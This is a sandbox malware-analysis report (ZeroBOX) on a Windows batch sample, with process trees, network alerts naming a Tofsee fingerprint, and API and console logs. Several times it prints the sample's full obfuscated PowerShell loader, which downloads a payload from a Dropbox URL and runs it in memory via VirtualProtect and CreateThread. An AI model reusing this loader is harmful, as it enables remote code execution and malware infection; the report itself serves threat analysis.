popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ac8077e64a8cd818f17039dd74c733618c178298b3ecfba41d15c0cd2be864b0_ac8077e64a8cd818_031023.bat

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P Hide_URL DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential AntiDebug PE File DLL AntiVM .NET DLL PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 10, 2023, 6:43 p.m. Oct. 10, 2023, 6:45 p.m.
Size 3.3KB
Type ASCII text, with very long lines, with no line terminators
MD5 8741a228fba24165aac6aac400aada40
SHA256 ac8077e64a8cd818f17039dd74c733618c178298b3ecfba41d15c0cd2be864b0
CRC32 9DB2136D
ssdeep 48:tbozNgvaKdUn1hBQFNiaEyw1unvWB4OTP9ujc8aTWgBRTWgBuTWEXtQDWUcaTCo2:RoUa0WqEZiCH8aygBRygBuymQiUXpoN
Yara
  • Antivirus - Contains references to security software

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "lEfj" C:\Users\test22\AppData\Local\Temp\ac8077e64a8cd818f17039dd74c733618c178298b3ecfba41d15c0cd2be864b0_ac8077e64a8cd818_031023.bat

    2552

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\ac8077e64a8cd818f17039dd74c733618c178298b3ecfba41d15c0cd2be864b0_ac8077e64a8cd818_031023.bat

      2624

      • cmd.exe c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"

        2712

        • cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od

          2796

        • powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"

          2864

Name Response Post-Analysis Lookup
dl.dropboxusercontent.com
CNAME edge-block-www-env.dropbox-dns.com
A 162.125.84.15
162.125.84.15
IP Address Status Action
162.125.84.15 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49216 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49205 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49216 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49205 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49216 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49205 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49210 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49206 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49206 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49206 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49211 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49223 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49211 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49223 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49211 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49223 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49212 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49212 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49219 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49219 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49212 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49228 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49219 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49228 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49228 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49215 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49215 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49220 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49220 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49215 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49220 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49217 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49217 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49222 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49222 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49217 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49222 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49225 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49225 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49221 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49221 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49225 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49221 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49227 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49227 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49224 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49224 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49227 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49224 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49209 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49209 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49209 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49213 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49213 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49213 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49214 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49214 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49214 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49218 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49218 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49218 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49226 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49226 -> 162.125.84.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49226 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49223 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49206 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49217 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49225 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49220 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49216 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49226 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49209 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49221 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49219 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49210 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49205 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49218 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49214 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49228 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49222 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49211 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49212 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49227 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49224 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49215 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity
TCP 192.168.56.101:49213 -> 162.125.84.15:443 2035593 ET INFO DropBox User Content Domain (dl .dropboxusercontent .com in TLS SNI) Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /min c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: call
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "The requested security protocol is not s
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: upported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:28
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + [Net.ServicePointManager]:: <<<< SecurityProtocol=[Enum]::ToObject([Net.Secur
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: ityProtocolType], 3072);$aa='[DllImport("kernel32.dll")]public static extern In
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: tPtr GlobalAlloc(uint b,uint c);';$b=Add-Type -MemberDefinition $aa -Name "AAA"
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: -PassThru;$abab = '[DllImport("kernel32.dll")]public static extern bool Virtu
console_handle: 0x0000006b
1 1 0

WriteConsoleW

